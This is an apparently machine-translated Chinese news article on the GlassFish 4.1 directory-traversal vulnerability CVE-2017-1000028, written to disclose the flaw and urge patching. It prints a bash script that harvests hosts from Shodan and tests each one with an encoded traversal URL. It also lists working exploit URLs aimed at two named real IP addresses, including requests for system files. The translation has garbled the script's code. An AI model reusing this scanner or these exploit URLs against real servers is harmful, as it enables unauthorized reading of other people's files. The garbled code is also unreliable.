主页调查GlassFish Oracle:漏洞将数据暴露给全球数以千计的服务器(分析)

GlassFish Oracle:漏洞将数据暴露给全球数以千计的服务器(分析)

GlassFish Oracle漏洞: 安全研究员Dimitris Roussis将我们分析为已知漏洞 Application Server 它的GlassFish 神谕 被公认 CVE-2017-1000028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028)目前将数据公开给全球数以千计的服务器。

甲骨文GlassFish

它的利用 安全真空 允许读取安装了Application Server的所有服务器文件的“目录遍历攻击”类型。

在研究人员进行的分析中,他们首先通过在300版本上安装了GlashFish的shodan搜索引擎使用示例4.1服务器。

然后,通过研究人员创建的自动脚本,他们检查哪些服务器实际存在。 漏洞.

/ bin / bash#从Shodan搜索引擎中获取300个结果shodan search --limit 300 --fields ip_str GlassFish 4.1端口:4848> servers_ip.txt#对IP cat服务器_ip.txt进行排序| 排序-n -t。 -k 1,1 -k 2,2 -k 3,3 -k 4,4> servers_sort.txt#删除所有空白sed -r's / \ s + // g'servers_sort.txt> servers.txt#删除临时文件rm服务器_ip.txt rm服务器_sort.txt#服务器列表输入=“ servers.txt”#在IFS =读取-r行时检查服务器是否存在漏洞ip = $行#http:// server_ip / theme / META-INF / ../../../../../../../../../../ url =“ http:// $ line:4848 / theme / META-INF /%c0 %ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae %c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0 %ae%c0%af%c0%ae%c0%ae%c0%af“ echo -n” ip:$ line“ fetch =`curl -s -o / dev / null -max-time 5 -w”% {http_code}“ $ url`; 如果[$ fetch = 200],则回显“-连接成功!服务器易受攻击”#将结果保存在脆弱的server_servers.txt中。回显“ $ url” >>弱势的servers.txt否则回显“-连接失败!服务器不易受到攻击” “ $输入”

服务器

该脚本的最终结果是创建一个包含链接的文件(网址)立即利用此漏洞。

查看文件中包含的链接 浏览器 我们可以在服务器的/根目录中看到所有文件。

插图:

Windows 服务器

http://52.25.200.71:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

甲骨文GlassFish

Linux服务器

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af

GlassFish Oracle服务器

现在,我们可以通过将文件路径添加到url的末尾来访问服务器上所需的任何文件。

例如

/等/密码

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/fstab

 

/根

http://87.98.212.108:4848/theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afroot

 

上述研究表明,一方面,漏洞可能导致在全球范围内大规模披露数据;另一方面,需要立即实施 软件更新 由系统管理员。

SecNews编辑团队衷心感谢研究员Dimitrios Roussis提供了及时有效的信息。

 

 

 

 

* Dimitris Roussis是爱琴海大学信息系统安全实验室的成员。

http://www.icsd.aegean.gr/group/members-data.php?group=L1&member=1652

spot_img

实时新闻